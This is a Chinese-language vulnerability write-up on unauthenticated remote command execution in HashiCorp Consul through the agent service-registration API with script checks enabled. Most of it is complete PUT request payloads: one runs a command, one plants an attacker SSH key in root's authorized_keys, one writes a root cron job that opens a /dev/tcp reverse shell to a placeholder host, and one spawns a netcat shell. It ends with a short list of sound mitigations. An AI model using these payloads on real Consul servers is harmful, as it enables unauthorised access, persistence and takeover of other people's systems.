1.漏洞简介
2018年11月27日,Consul在官方博客中发布了有关Consul工具可能存在远程命令执行(RCE)漏洞的公告,并提供了防护该漏洞的配置方案。Consul是HashiCorp公司推出的一款开源工具,旨在实现分布式系统的服务发现与配置。相较于其他分布式服务注册与发现的解决方案,Consul提供更为全面的功能。它内置了服务注册与发现框架、分布一致性协议实现、健康检查、Key/Value存储、多数据中心方案,无需依赖其他工具(如ZooKeeper等),使用也相对简单。由于Consul采用Go语言编写,因此具有天然的可移植性(支持Linux、Windows和Mac OS X系统);安装包中仅包含一个可执行文件,易于部署,并且能够与Docker等轻量级容器无缝配合。在特定配置下,恶意攻击者可以通过发送精心构造的HTTP请求,在未经授权的情况下在Consul服务端执行远程命令。
2.漏洞复现
验证Consul服务端存在该远程命令执行漏洞。
访问
http://ip:port/v1/agent/self
- 1
命令执行
PUT /v1/agent/service/register HTTP/1.1
Host: xxx
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64)
X-Consul-Token:
Content-type: application/json
Connection: close
Content-Length: 357
{
"ID": "bpPeMfZuAN",
"Name": "bpPeMfZuAN",
"Address":"127.0.0.1",
"Port":80,
"check":{
"script":"test",
"Args": ["sh", "-c","whoami"],
"interval":"10s",
"Timeout":"86400s"
}
}
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
写 ssh 密钥。
PUT /v1/agent/service/register HTTP/1.1
Host: xxx
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64)
X-Consul-Token:
Content-type: application/json
Connection: close
Content-Length: 357
{
"ID": "bpPeMfZuAN",
"Name": "bpPeMfZuAN",
"Address":"127.0.0.1",
"Port":80,
"check":{
"script":"test",
"Args": ["sh", "-c","echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDDIcxEKnl0blVW6jDkXRkVIlonMiely9CLouVA7YeqgHDDOIxxxx' >> /root/.ssh/authorized_keys"],
"interval":"10s",
"Timeout":"86400s"
}
}
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
写计划任务。
PUT /v1/agent/service/register HTTP/1.1
Host: xxx
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64)
X-Consul-Token:
Content-type: application/json
Connection: close
Content-Length: 357
{
"ID": "bpPeMfZuAN",
"Name": "bpPeMfZuAN",
"Address":"127.0.0.1",
"Port":80,
"check":{
"script":"test",
"Args": ["sh", "-c","echo '* * * * * /bin/bash -i >& /dev/tcp/xxxxx/1234 0>&1' >> /var/spool/cron/root"],
"interval":"10s",
"Timeout":"86400s"
}
}
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
反弹 shell。
PUT /v1/agent/service/register HTTP/1.1
Host: xxx
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64)
X-Consul-Token:
Content-type: application/json
Connection: close
Content-Length: 324
{
"ID": "bpPeMfZuAN",
"Name": "bpPeMfZuAN",
"Address":"127.0.0.1",
"Port":80,
"check":{
"script":"nc -e /bin/sh vps_ip port",
"Args": ["sh", "-c","nc -e /bin/sh vps_ip port"],
"interval":"10s",
"Timeout":"86400s"
}
}
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
3.影响范围
启用了脚本检查参数(-enable-script-checks)的所有版本。
4.防范措施
- 禁用Consul服务器上的脚本检查功能
- 确保Consul HTTP API服务无法通过外网访问或调用
- 对/v1/agent/service/register 禁止PUT方法
5.参考文章
文章知识点与官方知识档案匹配,可进一步学习相关知识
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论